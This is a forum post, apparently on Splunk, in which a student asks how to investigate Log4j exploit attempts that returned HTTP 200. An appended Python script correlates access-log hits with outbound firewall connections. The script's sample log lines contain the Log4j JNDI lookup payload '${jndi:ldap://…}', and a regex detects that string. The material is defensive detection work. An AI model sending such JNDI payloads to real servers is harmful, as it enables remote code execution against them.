Hello,
During these crazy Log4j times I would like to ask you for advice. I am new to Splunk/security, but I managed to create a dashboard for Log4j attempts.
I can see some Log4j scanning activity and the codes are 404, 400 etc. = I am not really worried about that.
But sometimes I have code 200, and as I can see this means:
The HTTP 200 OK success status response code indicates that the request has succeeded. The meaning of a success depends on the HTTP request method: ... GET : The resource has been fetched and is transmitted in the message body.
I added a screenshot.
I am wondering how to investigate it? Should I check for outbound traffic?
What is the best query? So far I have just one:
index=firewall 170.210.45.163 AND 31.131.16.127 ?
This is my Uni Lab environment, so I just want to develop myself and learn. What would you do if you see such a string? Many thanks
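Added example (not from the original post or from Splunk) showing the investigation logic behind the question: a 200 on a request that carries the Log4j lookup string only means the web server served that URL, so the next step is to check whether the server itself then opened an outbound connection to the address named in the string. It assumes a combined-format access log, a simple key=value firewall log, a lab web server at 10.0.0.5 and RFC 5737 documentation IPs, all constructed here; the same correlation can be run in Splunk against the firewall index with src set to the web server and dst set to the scanner IP.

```python
import re

# Constructed access log in combined format. IPs are RFC 5737 documentation
# addresses, not the ones from the post. Line 2 carries the lookup string in
# the User-Agent, which is the field Log4j-based apps most often log.
ACCESS_LOG = """\
203.0.113.7 - - [12/Dec/2021:10:01:02 +0000] "GET /login?user=${jndi:ldap://203.0.113.7:1389/a} HTTP/1.1" 404 512
203.0.113.7 - - [12/Dec/2021:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "${jndi:ldap://203.0.113.7:1389/a}"
198.51.100.9 - - [12/Dec/2021:10:02:00 +0000] "GET /api/health HTTP/1.1" 200 42
"""

# Constructed firewall log of connections leaving the lab network.
FIREWALL_LOG = """\
2021-12-12T10:01:06Z action=allow src=10.0.0.5 dst=203.0.113.7 dport=1389 proto=tcp
2021-12-12T10:05:00Z action=allow src=10.0.0.5 dst=198.51.100.200 dport=443 proto=tcp
"""

WEB_SERVER_IP = "10.0.0.5"  # assumed internal address of the lab web server

ACCESS_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
                       r'(?P<status>\d{3}) \S+(?: "(?P<ref>[^"]*)" "(?P<ua>[^"]*)")?')
JNDI_RE = re.compile(r'\$\{jndi:', re.IGNORECASE)  # the basic, un-obfuscated form
FW_RE = re.compile(r'src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+)')

def find_jndi_hits(access_log):
    """Return (client_ip, http_status) for every request line carrying a JNDI lookup."""
    hits = []
    for line in access_log.splitlines():
        m = ACCESS_RE.match(line)
        if m and JNDI_RE.search(line):
            hits.append((m["src"], int(m["status"])))
    return hits

def outbound_callbacks(firewall_log, server_ip, suspect_ips):
    """Return (dst_ip, dst_port) for connections the web server opened to a suspect IP."""
    callbacks = []
    for line in firewall_log.splitlines():
        m = FW_RE.search(line)
        if m and m["src"] == server_ip and m["dst"] in suspect_ips:
            callbacks.append((m["dst"], int(m["dport"])))
    return callbacks

def triage(access_log, firewall_log, server_ip):
    """Correlate: which scanner IPs got a 200, and did the server call any of them back?"""
    hits = find_jndi_hits(access_log)
    suspects = {src for src, _ in hits}
    return {
        "scanner_ips": sorted(suspects),
        "status_200_from": sorted({src for src, st in hits if st == 200}),
        "callbacks": outbound_callbacks(firewall_log, server_ip, suspects),
    }
```

An empty "callbacks" list with only 404/400 hits is ordinary scanning noise; a callback to the scanner's IP and port is the signal that needs a real incident response.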